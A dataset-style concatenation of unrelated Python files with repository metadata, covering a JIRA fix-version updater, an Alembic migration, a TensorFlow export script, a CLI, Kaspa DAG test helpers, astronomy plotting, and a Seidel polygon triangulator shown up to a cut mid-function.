#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Utility for updating fix version for Jiras.
#
# usage: ./gobblin-jira-version (see config env vars below)
#
from __future__ import print_function
import json
import os
import re
import subprocess
import sys
import textwrap
# Python 3 compatibility
try:
import urllib2 as urllib
except ImportError:
import urllib.request as urllib
if sys.version_info[0] == 3:
raw_input = input
try:
import click
except ImportError:
print("Could not find the click library. Run 'sudo pip install click' to install.")
sys.exit(-1)
try:
import keyring
except ImportError:
print("Could not find the keyring library. Run 'sudo pip install keyring' to install.")
sys.exit(-1)
JIRA_BASE = "https://issues.apache.org/jira/browse"
JIRA_API_BASE = "https://issues.apache.org/jira"
TMP_CREDENTIALS = {}
def register(username, password):
""" Use this function to register a JIRA account in your OS' keyring """
keyring.set_password('gobblin-pr', username, password)
def validate_jira_id(jira_id):
if not jira_id:
return
elif isinstance(jira_id, int):
return 'GOBBLIN-{}'.format(abs(jira_id))
# first look for GOBBLIN-X
ids = re.findall("GOBBLIN-[0-9]{1,6}", jira_id)
if len(ids) > 1:
raise click.UsageError('Found multiple issue ids: {}'.format(ids))
elif len(ids) == 1:
jira_id = ids[0]
elif not ids:
# if we don't find GOBBLIN-X, see if jira_id is an int
try:
jira_id = 'GOBBLIN-{}'.format(abs(int(jira_id)))
except ValueError:
raise click.UsageError(
'JIRA id must be an integer or have the form GOBBLIN-X')
return jira_id
def update_jira_issue(fix_version):
"""
Update JIRA issue
fix_version: the version to assign to the Gobblin JIRAs.
"""
try:
import jira.client
except ImportError:
print("Could not find jira-python library; exiting. Run "
"'sudo pip install jira' to install.")
sys.exit(-1)
# ASF JIRA username
JIRA_USERNAME = os.environ.get("JIRA_USERNAME", '')
if not JIRA_USERNAME:
JIRA_USERNAME = TMP_CREDENTIALS.get('JIRA_USERNAME', '')
# ASF JIRA password
JIRA_PASSWORD = os.environ.get("JIRA_PASSWORD", '')
if not JIRA_PASSWORD:
JIRA_PASSWORD = TMP_CREDENTIALS.get('JIRA_PASSWORD', '')
if not JIRA_USERNAME:
JIRA_USERNAME = click.prompt(
click.style('Username for Gobblin JIRA', fg='blue', bold=True),
type=str)
click.echo(
'Set a JIRA_USERNAME env var to avoid this prompt in the future.')
TMP_CREDENTIALS['JIRA_USERNAME'] = JIRA_USERNAME
if JIRA_USERNAME and not JIRA_PASSWORD:
JIRA_PASSWORD = keyring.get_password("gobblin-pr", JIRA_USERNAME)
if JIRA_PASSWORD:
click.echo("Obtained password from keyring. To reset remove it there.")
if not JIRA_PASSWORD:
JIRA_PASSWORD = click.prompt(
click.style('Password for Gobblin JIRA', fg='blue', bold=True),
type=str,
hide_input=True)
if JIRA_USERNAME and JIRA_PASSWORD:
if click.confirm(click.style("Would you like to store your password "
"in your keyring?", fg='blue', bold=True)):
register(JIRA_USERNAME, JIRA_PASSWORD)
TMP_CREDENTIALS['JIRA_PASSWORD'] = JIRA_PASSWORD
try:
asf_jira = jira.client.JIRA(
{'server': JIRA_API_BASE},
basic_auth=(JIRA_USERNAME, JIRA_PASSWORD))
except:
raise ValueError('Could not log in to JIRA!')
for jira_obj in asf_jira.search_issues('filter=12342798', startAt=0, maxResults=2000):
jira_id = jira_obj.key
click.echo("Processing JIRA: %s" % jira_id)
try:
issue = asf_jira.issue(jira_id)
fixVersions = []
for version in issue.fields.fixVersions:
fixVersions.append({'name': version.name})
fixVersions.append({'name': fix_version})
issue.update(fields={'fixVersions': fixVersions})
except Exception as e:
raise ValueError(
"ASF JIRA could not find issue {}\n{}".format(jira_id, e))
def update_jira_issues():
fix_version = click.prompt(
click.style(
"Enter fix version", fg='blue', bold=True),
default=None)
if fix_version == None:
raise click.UsageError('No fix version specified')
update_jira_issue(
fix_version=fix_version)
if __name__ == "__main__":
try:
update_jira_issues()
except:
raise
|
[
"abhishektiwari.btech@gmail.com"
] |
abhishektiwari.btech@gmail.com
|
|
d48e94c2e6566443a5f4da190cd17c660f99d236
|
d03da8f6518fca612daafc6cd856c1ee21e82087
|
/migrations/versions/56bf3c2acb25_comments.py
|
94d21e2ead182984afdc50695e941a960b72ab5d
|
[] |
no_license
|
kiudou/flask_again
|
78df06dc2a3f810b19d6aa734f207cef0adf60b3
|
74f5816f8cf94b18d6325497eb49486700173aa9
|
refs/heads/master
| 2022-12-01T22:34:39.978973
| 2018-04-18T05:53:34
| 2018-04-18T05:53:34
| 111,967,303
| 0
| 1
| null | 2022-11-28T10:58:27
| 2017-11-25T01:21:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
"""comments
Revision ID: 56bf3c2acb25
Revises: ecf568fe583e
Create Date: 2018-01-11 22:01:35.622098
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '56bf3c2acb25'
down_revision = 'ecf568fe583e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('comment',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('body_html', sa.Text(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('disabled', sa.Boolean(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('post_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['post_id'], ['posts.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_comment_timestamp'), 'comment', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_comment_timestamp'), table_name='comment')
op.drop_table('comment')
# ### end Alembic commands ###
|
[
"qidong120@hotmail.com"
] |
qidong120@hotmail.com
|
aa3a7e324554a6b388c08bf4a9817c9ece2af45e
|
3114632ff07ee00bae1b2f0fa60df372aec247e2
|
/model/lstm/export.py
|
cfaa591237e0fd8188643c397a9bcb2acf95c37e
|
[] |
no_license
|
linguishi/chinese_sentiment
|
fabbb10f6efb2fe41488c23ec6a48e7b0439b7e7
|
06bdc816c678a4998bb04576bd76d3cae118c4c2
|
refs/heads/master
| 2022-11-05T20:53:30.785979
| 2022-10-22T15:43:20
| 2022-10-22T15:43:20
| 162,000,470
| 678
| 96
| null | 2022-06-21T21:40:16
| 2018-12-16T12:49:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 789
|
py
|
from pathlib import Path
import json
import tensorflow as tf
from main import model_fn
PARAMS = './results/params.json'
MODEL_DIR = './results/model'
def serving_input_receiver_fn():
words = tf.placeholder(dtype=tf.string, shape=[None, None], name='words')
nwords = tf.placeholder(dtype=tf.int32, shape=[None], name='nwords')
receiver_tensors = {'words': words, 'nwords': nwords}
features = {'words': words, 'nwords': nwords}
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
if __name__ == '__main__':
with Path(PARAMS).open(encoding='utf-8') as f:
params = json.load(f)
estimator = tf.estimator.Estimator(model_fn, MODEL_DIR, params=params)
estimator.export_saved_model('saved_model', serving_input_receiver_fn)
|
[
"513228837@qq.com"
] |
513228837@qq.com
|
9611e6b173e8da2152c8313f4dd5182e6e2c6d2e
|
66a087ce740887a26dae70b96e468ce860cb971d
|
/src/cli.py
|
6e9270a33db54eb31e1d5c58e37391477dc71fc7
|
[] |
no_license
|
lshin/foodtruck-cli
|
7a1e2964aa48a810c216647293f2b8c33b83a621
|
b446f4454df89bc438f7b2f49e722f727b698ff1
|
refs/heads/master
| 2021-01-19T14:21:19.432110
| 2017-09-25T21:40:10
| 2017-09-25T21:40:10
| 100,899,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,126
|
py
|
"""
show_open_food_trucks
Usage:
show_open_food_trucks
show_open_food_trucks [--limit=<number>]
show_open_food_trucks -h | --help
show_open_food_trucks --version
Options:
-h --help Show this screen.
--version Show version.
--limit=<number> A number of items to display [default: 10].
Examples:
show_open_food_trucks
"""
from inspect import getmembers, isclass
from docopt import docopt
from . import __version__ as VERSION
def main():
"""
Read all options of commands with docopt
http://docopt.org/
"""
import commands
options = docopt(__doc__, version=VERSION)
for name, val in options.iteritems():
_command_run(commands, options, name)
else:
_command_run(commands, options, 'foodtruck')
def _command_run(commands, options, name):
if hasattr(commands, name):
module = getattr(commands, name)
commands = getmembers(module, isclass)
command = [command[1] for command in commands if command[0] != 'Base'][0]
command = command(options)
command.run()
|
[
"leo@sh1n.com"
] |
leo@sh1n.com
|
59cafbd895db387e940013040b0c5cf818e776ae
|
f8450a92c000667ef7f5f437a789ead015b8f140
|
/kaspad/kaspa_dags/dag_tools/chains_dag.py
|
67fddb15d7a26fc1ec787eca327476264a63a3c0
|
[] |
no_license
|
fakecoinbase/kaspanetslashkaspy_tools
|
ee467c18160e3db9059e8d30d42fe56fb8ad8af7
|
61ec322757a5f543da68e5d0c0ce1606edd1bf89
|
refs/heads/master
| 2023-03-30T19:53:14.491784
| 2020-07-25T16:43:30
| 2020-07-25T16:43:30
| 282,572,688
| 0
| 0
| null | 2021-03-26T00:01:03
| 2020-07-26T04:06:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,497
|
py
|
import os
import subprocess
from kaspy_tools.local_run.run_local_services import run_services
from kaspy_tools.kaspad.utilities import block_generator
from kaspy_tools.kaspad.json_rpc import json_rpc_requests
from kaspy_tools.kaspad.kaspa_dags.dag_tools import save_restore_dags
from kaspy_tools.logs import config_logger
KT_logger = config_logger.get_kaspy_tools_logger()
def make_and_submit_single_chain(*, floors=None, pay_address, conn):
if not floors:
floors=[]
for f in floors:
floor_blocks = []
for b in range(f):
new_block, block_hash = block_generator.generate_valid_block_from_template(conn=conn, native_txs=[],
pay_address=pay_address)
floor_blocks.append(new_block)
for block in floor_blocks:
response, response_json = json_rpc_requests.submit_block_request(block.hex(), options=None, conn=conn)
def get_current_blocks(conn):
raw_blocks, verbose_blocks = json_rpc_requests.get_blocks(requested_blocks_count=200, conn=conn)
return raw_blocks
def submit_saved_blocks(saved_blocks, conn):
for block in saved_blocks:
response, response_json = json_rpc_requests.submit_block_request(block, options=None, conn=conn)
def clean_blocks(*, dir_name='kaspad'):
run_services.stop_and_remove_all_runners()
save_restore_dags.clear_dag_files(work_dir=dir_name)
run_services.run_kaspanet_services()
def get_blocks_from_chain(*, chain_definition=None, clear=True, pay_address, conn):
if clear:
clean_blocks()
make_and_submit_single_chain(floors=chain_definition, pay_address=pay_address, conn=conn)
chain_blocks = get_current_blocks(conn=conn)
return chain_blocks
def make_chains_dag(conn, pay_address):
chain_one = get_blocks_from_chain(chain_definition=[1,1,1,1,1], conn=conn, pay_address=pay_address)
# when we get the blocks for chain_two, we clean blocks of chain_one
chain_two = get_blocks_from_chain(chain_definition=[2,1], conn=conn, pay_address=pay_address)
# Now chain_two is submitted, we submit chain_one
submit_saved_blocks(saved_blocks=chain_one, conn=conn)
# Now chain_one AND chain_two are submitted
# getting chain_three without clearing:
chain_three = get_blocks_from_chain(chain_definition=[1 for i in range(110)], clear=False, conn=conn,
pay_address=pay_address)
# now submit
|
[
"noreply@github.com"
] |
fakecoinbase.noreply@github.com
|
e7922df463850164f98f54a547ff341ee05336f4
|
9f3f36b6485a5d3fc5647414e921a7e31be8075d
|
/procedure_06252015.py
|
0b87c488e16ff453291cbc591cbb6694b5ab2f5f
|
[] |
no_license
|
nhuntwalker/new_work_scripts
|
10993c367d0fa042160f4d451f4f0b3c286600b9
|
1f6b572b8eae8cf5208f621e65db16c64f52bdb4
|
refs/heads/master
| 2021-01-25T04:02:35.474688
| 2016-02-24T02:23:14
| 2016-02-24T02:23:14
| 32,169,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,715
|
py
|
from thesiscode.quality import *
from thesiscode.plotting import *
import pandas as pd
simbad = Data(pd.read_csv("../samples/simbad_allwise_allmatches.dat", sep="|"))
macho = Data(pd.read_csv("../samples/macho_allwise_allmatches.dat", sep="|"))
ogle = Data(pd.read_csv("../samples/ogle_allwise_allmatches.dat", sep="|"))
simbad.clean_me()
macho.clean_me()
ogle.clean_me()
simbad.cut_me((simbad.data["coljk"] > 1.1) & (simbad.data["col23"] > 0.3), "J-K > 1.1 and W2-W3 > 0.3")
simplot = Plot(simbad.cutdata)
simplot.plot_colorcolor_completeness(simbad.cleaned, "coljk", "col23", "J-K", "W2-W3", xlims=(-0.5,5), ylims=(-0.5,5), vmin=0.0, vmax=1.0, cbar=True)
simplot.reset_figure()
simplot.plot_galactic_completeness(simbad.cleaned, "glon", "glat", xlims=(-180,180), vmin=0.0, vmax=1.0, cbar=True)
simplot.reset_figure()
macho.cut_me((macho.data["coljk"] > 1.1) & (macho.data["col23"] > 0.3), "J-K > 1.1 and W2-W3 > 0.3")
machoplot = Plot(macho.cutdata)
machoplot.plot_colorcolor_completeness(macho.cleaned, "coljk", "col23", "J-K", "W2-W3", xlims=(-0.5,5), ylims=(-0.5,5), vmin=0.0, vmax=1.0, cbar=True)
machoplot.reset_figure()
machoplot.plot_galactic_completeness(macho.cleaned, "glon", "glat", xlims=(-180,180), vmin=0.0, vmax=1.0, cbar=True)
machoplot.reset_figure()
ogle.cut_me((ogle.data["coljk"] > 1.1) & (ogle.data["col23"] > 0.3), "J-K > 1.1 and W2-W3 > 0.3")
ogleplot = Plot(ogle.cutdata)
ogleplot.plot_colorcolor_completeness(ogle.cleaned, "coljk", "col23", "J-K", "W2-W3", xlims=(-0.5,5), ylims=(-0.5,5), vmin=0.0, vmax=1.0, cbar=True)
ogleplot.reset_figure()
ogleplot.plot_galactic_completeness(ogle.cleaned, "glon", "glat", xlims=(-180,180), vmin=0.0, vmax=1.0, cbar=True)
ogleplot.reset_figure()
|
[
"nhuntwalker@gmail.com"
] |
nhuntwalker@gmail.com
|
ee04b89a047c94c9b8b1a8c8c05de21ed4ddfde2
|
6562b410385bb444316eda3c054fff9662d7e727
|
/polytri/seidel.py
|
98621e2ad84d3cf9549b976ae295b84ecac6afd8
|
[
"LicenseRef-scancode-public-domain-disclaimer"
] |
permissive
|
mhearne-usgs/polytri
|
92a11c367936047e3b0f8b66e1b7949049323192
|
a8f5513df8d2a2b31ccf9db45ebd588d58a12f8c
|
refs/heads/master
| 2021-01-23T16:37:23.310212
| 2014-10-06T14:38:16
| 2014-10-06T14:38:16
| 24,344,232
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,211
|
py
|
#
# Poly2Tri
# Copyright (c) 2009, Mason Green
# http://code.google.com/p/poly2tri/
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# self list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# self list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Poly2Tri nor the names of its contributors may be
# used to endorse or promote products derived from self software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from random import shuffle
from math import atan2, sqrt  # sqrt is used by Point.length()
##
## Based on Raimund Seidel'e paper "A simple and fast incremental randomized
## algorithm for computing trapezoidal decompositions and for triangulating polygons"
## (Ported from poly2tri)
##
# Shear transform. May affect numerical robustness
SHEAR = 1e-3
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.next, self.prev = None, None
def __sub__(self, other):
if isinstance(other, Point):
return Point(self.x - other.x, self.y - other.y)
else:
return Point(self.x - other, self.y - other)
def __add__(self, other):
if isinstance(other, Point):
return Point(self.x + other.x, self.y + other.y)
else:
return Point(self.x + other, self.y + other)
def __mul__(self, f):
return Point(self.x * f, self.y * f)
def __div__(self, a):
return Point(self.x / a, self.y / a)
def cross(self, p):
return self.x * p.y - self.y * p.x
def dot(self, p):
return self.x * p.x + self.y * p.y
def length(self):
return sqrt(self.x * self.x + self.y * self.y)
def normalize(self):
return self / self.length()
def less(self, p):
return self.x < p.x
def neq(self, other):
return other.x != self.x or other.y != self.y
def clone(self):
return Point(self.x, self.y)
def orient2d(pa, pb, pc):
acx = pa.x - pc.x;
bcx = pb.x - pc.x;
acy = pa.y - pc.y;
bcy = pb.y - pc.y;
return acx * bcy - acy * bcx;
class Edge(object):
def __init__(self, p, q):
self.p = p
self.q = q
self.slope = (q.y - p.y) / (q.x - p.x) if q.x - p.x != 0 else 0
self.b = p.y - (p.x * self.slope)
self.above, self.below = None, None
self.mpoints = [p, q]
def is_above(self, point):
return orient2d(self.p, self.q, point) < 0
def is_below(self, point):
return orient2d(self.p, self.q, point) > 0
def add_mpoint(self, point):
for mp in self.mpoints:
if not mp.neq(point): return
self.mpoints.append(point)
class Trapezoid(object):
def __init__(self, left_point, right_point, top, bottom):
self.left_point = left_point
self.right_point = right_point
self.top = top
self.bottom = bottom
self.upper_left = None
self.upper_right = None
self.lower_left = None
self.lower_right = None
self.inside = True
self.sink = None
self.key = hash(self)
def update_left(self, ul, ll):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
def update_right(self, ur, lr):
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def update_left_right(self, ul, ll, ur, lr):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def trim_neighbors(self):
if self.inside:
self.inside = False
if self.upper_left != None: self.upper_left.trim_neighbors()
if self.lower_left != None: self.lower_left.trim_neighbors()
if self.upper_right != None: self.upper_right.trim_neighbors()
if self.lower_right != None: self.lower_right.trim_neighbors()
def contains(self, point):
return (point.x > self.left_point.x and point.x < self.right_point.x and
self.top.is_above(point) and self.bottom.is_below(point))
def vertices(self):
v1 = line_intersect(self.top, self.left_point.x)
v2 = line_intersect(self.bottom, self.left_point.x)
v3 = line_intersect(self.bottom, self.right_point.x)
v4 = line_intersect(self.top, self.right_point.x)
return v1, v2, v3, v4
def add_points(self):
if self.left_point is not self.bottom.p:
self.bottom.add_mpoint(self.left_point)
if self.right_point is not self.bottom.q:
self.bottom.add_mpoint(self.right_point)
if self.left_point is not self.top.p:
self.top.add_mpoint(self.left_point)
if self.right_point is not self.top.q:
self.top.add_mpoint(self.right_point)
def area(self):
p = list(self.vertices())
x0 = p[0][0]; y0 = p[0][1]
x1 = p[1][0]; y1 = p[1][1]
return 0.5 * abs(sum(x0*y1 - x1*y0
for ((x0, y0), (x1, y1)) in self.segments(p)))
def segments(self, p):
return zip(p, p[1:] + [p[0]])
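# (area() above is the shoelace formula applied to the trapezoid's four
# vertices: 0.5 * |sum(x_i * y_{i+1} - x_{i+1} * y_i)| over consecutive pairs.)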
def line_intersect(edge, x):
y = edge.slope * x + edge.b
return x, y
class Triangulator(object):
##
## Number of points should be > 3
##
def __init__(self, poly_line):
self.polygons = []
self.trapezoids = []
self.xmono_poly = []
self.edge_list = self.init_edges(poly_line)
self.trapezoidal_map = TrapezoidalMap()
self.bounding_box = self.trapezoidal_map.bounding_box(self.edge_list)
self.query_graph = QueryGraph(isink(self.bounding_box))
self.process()
def triangles(self):
triangles = []
for p in self.polygons:
verts = []
for v in p:
verts.append((v.x, v.y))
triangles.append(verts)
return triangles
def trapezoid_map(self):
return self.trapezoidal_map.map
# Build the trapezoidal map and query graph
def process(self):
for edge in self.edge_list:
traps = self.query_graph.follow_edge(edge)
for t in traps:
# Remove old trapezoids
del self.trapezoidal_map.map[t.key]
# Bisect old trapezoids and create new
cp = t.contains(edge.p)
cq = t.contains(edge.q)
if cp and cq:
tlist = self.trapezoidal_map.case1(t, edge)
self.query_graph.case1(t.sink, edge, tlist)
elif cp and not cq:
tlist = self.trapezoidal_map.case2(t, edge)
self.query_graph.case2(t.sink, edge, tlist)
elif not cp and not cq:
tlist = self.trapezoidal_map.case3(t, edge)
self.query_graph.case3(t.sink, edge, tlist)
else:
tlist = self.trapezoidal_map.case4(t, edge)
self.query_graph.case4(t.sink, edge, tlist)
# Add new trapezoids to map
for t in tlist:
self.trapezoidal_map.map[t.key] = t
self.trapezoidal_map.clear()
# Mark outside trapezoids w/ depth-first search
for k, t in self.trapezoidal_map.map.items():
self.mark_outside(t)
# Collect interior trapezoids
for k, t in self.trapezoidal_map.map.items():
if t.inside:
self.trapezoids.append(t)
t.add_points()
# Generate the triangles
self.create_mountains()
def mono_polies(self):
polies = []
for x in self.xmono_poly:
polies.append(x.monoPoly)
return polies
def create_mountains(self):
for edge in self.edge_list:
if len(edge.mpoints) > 2:
mountain = MonotoneMountain()
points = merge_sort(edge.mpoints)
for p in points:
mountain.add(p)
mountain.process()
for t in mountain.triangles:
self.polygons.append(t)
self.xmono_poly.append(mountain)
def mark_outside(self, t):
if t.top is self.bounding_box.top or t.bottom is self.bounding_box.bottom:
t.trim_neighbors()
def init_edges(self, points):
edge_list = []
size = len(points)
for i in range(size):
j = i + 1 if i < size-1 else 0
p = points[i][0], points[i][1]
q = points[j][0], points[j][1]
edge_list.append((p, q))
return self.order_edges(edge_list)
def order_edges(self, edge_list):
edges = []
for e in edge_list:
p = shear_transform(e[0])
q = shear_transform(e[1])
if p.x > q.x:
edges.append(Edge(q, p))
else:
edges.append(Edge(p, q))
# Randomized incremental algorithm
shuffle(edges)
return edges
def shear_transform(point):
return Point(point[0] + SHEAR * point[1], point[1])
def merge_sort(l):
if len(l)>1 :
lleft = merge_sort(l[:len(l)/2])
lright = merge_sort(l[len(l)/2:])
p1, p2, p = 0, 0, 0
while p1<len(lleft) and p2<len(lright):
if lleft[p1].x < lright[p2].x:
l[p]=lleft[p1]
p+=1
p1+=1
else:
l[p]=lright[p2]
p+=1
p2+=1
if p1<len(lleft):l[p:]=lleft[p1:]
elif p2<len(lright):l[p:]=lright[p2:]
else: print("internal error")
return l
class TrapezoidalMap(object):
def __init__(self):
self.map = {}
self.margin = 50.0
self.bcross = None
self.tcross = None
def clear(self):
self.bcross = None
self.tcross = None
def case1(self, t, e):
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, e.q, t.top, e))
trapezoids.append(Trapezoid(e.p, e.q, e, t.bottom))
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, trapezoids[3], None)
trapezoids[2].update_left_right(None, trapezoids[0], None, trapezoids[3])
trapezoids[3].update_right(t.upper_right, t.lower_right)
return trapezoids
def case2(self, t, e):
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, rp, t.top, e))
trapezoids.append(Trapezoid(e.p, rp, e, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, t.upper_right, None)
trapezoids[2].update_left_right(None, trapezoids[0], None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[1]
e.below = trapezoids[2]
return trapezoids
def case3(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].update_right(t.upper_right, None)
trapezoids[0].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, t.top, e))
trapezoids[0].update_left_right(t.upper_left, e.above, t.upper_right, None)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].update_right(None, t.lower_right)
trapezoids[1].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, e, t.bottom))
trapezoids[1].update_left_right(e.below, t.lower_left, None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[0]
e.below = trapezoids[1]
return trapezoids
def case4(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, t.top, e))
trapezoids[0].update_left(t.upper_left, e.above)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, e, t.bottom))
trapezoids[1].update_left(e.below, t.lower_left)
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[2].update_left_right(trapezoids[0], trapezoids[1], t.upper_right, t.lower_right)
return trapezoids
def bounding_box(self, edges):
margin = self.margin
max = edges[0].p + margin
min = edges[0].q - margin
for e in edges:
if e.p.x > max.x: max = Point(e.p.x + margin, max.y)
if e.p.y > max.y: max = Point(max.x, e.p.y + margin)
if e.q.x > max.x: max = Point(e.q.x + margin, max.y)
if e.q.y > max.y: max = Point(max.x, e.q.y + margin)
if e.p.x < min.x: min = Point(e.p.x - margin, min.y)
if e.p.y < min.y: min = Point(min.x, e.p.y - margin)
if e.q.x < min.x: min = Point(e.q.x - margin, min.y)
if e.q.y < min.y: min = Point(min.x, e.q.y - margin)
top = Edge(Point(min.x, max.y), Point(max.x, max.y))
bottom = Edge(Point(min.x, min.y), Point(max.x, min.y))
left = top.p
right = top.q
trap = Trapezoid(left, right, top, bottom)
self.map[trap.key] = trap
return trap
class Node(object):
def __init__(self, lchild, rchild):
self.parent_list = []
self.lchild = lchild
self.rchild = rchild
if lchild != None:
lchild.parent_list.append(self)
if rchild != None:
rchild.parent_list.append(self)
def replace(self, node):
for parent in node.parent_list:
if parent.lchild is node:
parent.lchild = self
else:
parent.rchild = self
self.parent_list += node.parent_list
class Sink(Node):
def __init__(self, trapezoid):
super(Sink, self).__init__(None, None)
self.trapezoid = trapezoid
trapezoid.sink = self
def locate(self, edge):
return self
def isink(trapezoid):
if trapezoid.sink is None:
return Sink(trapezoid)
return trapezoid.sink
class XNode(Node):
def __init__(self, point, lchild, rchild):
super(XNode, self).__init__(lchild, rchild)
self.point = point
def locate(self, edge):
if edge.p.x >= self.point.x:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class YNode(Node):
def __init__(self, edge, lchild, rchild):
super(YNode, self).__init__(lchild, rchild)
self.edge = edge
def locate(self, edge):
if self.edge.is_above(edge.p):
return self.rchild.locate(edge)
if self.edge.is_below(edge.p):
return self.lchild.locate(edge)
if edge.slope < self.edge.slope:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class QueryGraph:
def __init__(self, head):
self.head = head
def locate(self, edge):
return self.head.locate(edge).trapezoid
def follow_edge(self, edge):
trapezoids = [self.locate(edge)]
while(edge.q.x > trapezoids[-1].right_point.x):
if edge.is_above(trapezoids[-1].right_point):
trapezoids.append(trapezoids[-1].upper_right)
else:
trapezoids.append(trapezoids[-1].lower_right)
return trapezoids
def replace(self, sink, node):
if sink.parent_list:
node.replace(sink)
else:
self.head = node
def case1(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
qNode = XNode(edge.q, yNode, isink(tlist[3]))
pNode = XNode(edge.p, isink(tlist[0]), qNode)
self.replace(sink, pNode)
def case2(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
pNode = XNode(edge.p, isink(tlist[0]), yNode)
self.replace(sink, pNode)
def case3(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
self.replace(sink, yNode)
def case4(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
qNode = XNode(edge.q, yNode, isink(tlist[2]))
self.replace(sink, qNode)
PI_SLOP = 3.1
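# PI_SLOP is a threshold just below pi: in MonotoneMountain.process(), a vertex
# whose interior angle is within this slop of +/-pi (or is exactly 0) is
# treated as (nearly) collinear and removed before ear clipping.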
class MonotoneMountain:
def __init__(self):
self.size = 0
self.tail = None
self.head = None
self.positive = False
self.convex_points = set()
self.mono_poly = []
self.triangles = []
self.convex_polies = []
def add(self, point):
        if self.size == 0:
self.head = point
self.size = 1
        elif self.size == 1:
self.tail = point
self.tail.prev = self.head
self.head.next = self.tail
self.size = 2
else:
self.tail.next = point
point.prev = self.tail
self.tail = point
self.size += 1
def remove(self, point):
next = point.next
prev = point.prev
point.prev.next = next
point.next.prev = prev
self.size -= 1
def process(self):
self.positive = self.angle_sign()
self.gen_mono_poly()
p = self.head.next
while p.neq(self.tail):
a = self.angle(p)
if a >= PI_SLOP or a <= -PI_SLOP or a == 0:
self.remove(p)
